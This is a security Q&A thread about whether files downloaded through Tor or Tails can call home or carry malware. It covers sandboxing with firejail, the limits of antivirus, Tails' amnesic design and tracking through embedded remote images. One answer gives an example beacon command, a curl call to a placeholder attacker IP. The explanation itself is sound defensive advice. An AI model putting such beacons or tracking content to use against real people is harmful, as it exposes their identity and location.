-1

If I download a file (PDF,doc,image,video etc) with a tails/tor setup, how can I ensure the file doesn't "call home" or isnt imbedded with malware (other than looking at the hash)? Will a simple malware scan work? And if I use tails to open the files and disconnect from the network I'm using can I still have my anonymity compromised?

thatsmynickityname
  • 27
  • 4
  • well theres a lot of tools to analyze these files..... too many to list. But you can put an application in a sandbox with `firejail`. You could open your pdf reader like `firejail xreader malware.pdf` and it would restrict the application with Linux namespaces – john doe Aug 13 '20 at 01:53
  • As said in one answer - it does not matter where you got this file from. Does this answer your question? [How to safely view a malicious PDF?](https://security.stackexchange.com/questions/18878/how-to-safely-view-a-malicious-pdf) – Steffen Ullrich Aug 13 '20 at 05:58

1 Answers1

1

The fact that a file was downloaded with TOR doesn't really have much relevance to whether or not it's technically safe to open, except maybe that it might be "more likely" to be malware. If you're asking if opening the file will compromise your anonymity, then that depends on the filetype and your setup. Generally you can assume that unless you're using tails or a VM/Router that is proxying all traffic, anything that executes code as your local user is going to be able to "curl http://attacker-ip/3948291" and give you up that way. I wouldn't even be comfortable opening up a regular PDF/DOCX file because it'd be hard to be sure there wasn't some documented feature I'm unaware of where those file formats autoload external content, nevermind a zeroday.

More generally, don't trust antivirus scans to be anything except a second line of defense. Consumer AV software (and honestly most enterprise IDS software) is generally only able to catch simple variations of already logged malware, or very obviously (to a computer) malicious combinations of sys or library calls. You also shouldn't expect to be safe unplugging the computer while you open it unless you're sure that whatever code you executed won't start up again later.

Dean Valentine
  • 64
  • 2
  • Those are really great points, thank you! Can a file instigate a malware attack just by downloading or does it need to be opened first? If so would downloading a file then rebooting a new instance of tails with no network connection be enough to assure there's isn't an attack? ( assuming the computer never contained a harddive and only tails usb), otherwise the malware must be stored on your ram right?? Is that even possible? – thatsmynickityname Aug 13 '20 at 02:45
  • TAILS is designed to be amnesic; you're given a clean slate when you reboot tails, so unless it persisted on some external storage that you then reintroduced, you should be OK. The problem with downloaded files isn't necessarily just code execution; if I can embed an image that is retrieved via hyperlink in that DOCX file, then I can just look on my server and see what IP connected to me, and now (if you didn't have TAILS or one of the other solutions I mentioned), I have your IP address. – Dean Valentine Aug 13 '20 at 02:51
  • Ok that makes sense, thank you for clarifying! What about if the file is downloaded to a usb drive then reopened on that drive when the network is offline (on a reboot of tails)? Additionally, waterhole attacks use similar malware correct? I read that the malware can be installed at a firmware level, is that true? If i fell victim to both a waterhole attack and an embedded malware attack by the same person is tails still going to keep my anonymity safe? – thatsmynickityname Aug 13 '20 at 03:12
  • You would do better to learn more about where the security boundaries exist in these systems and their guarantees than to try to rote memorize the status of each scenario you can think of. Historically that tactic doesn't work very well. – Dean Valentine Aug 13 '20 at 03:21
  • Good point, ok thank you! – thatsmynickityname Aug 13 '20 at 03:22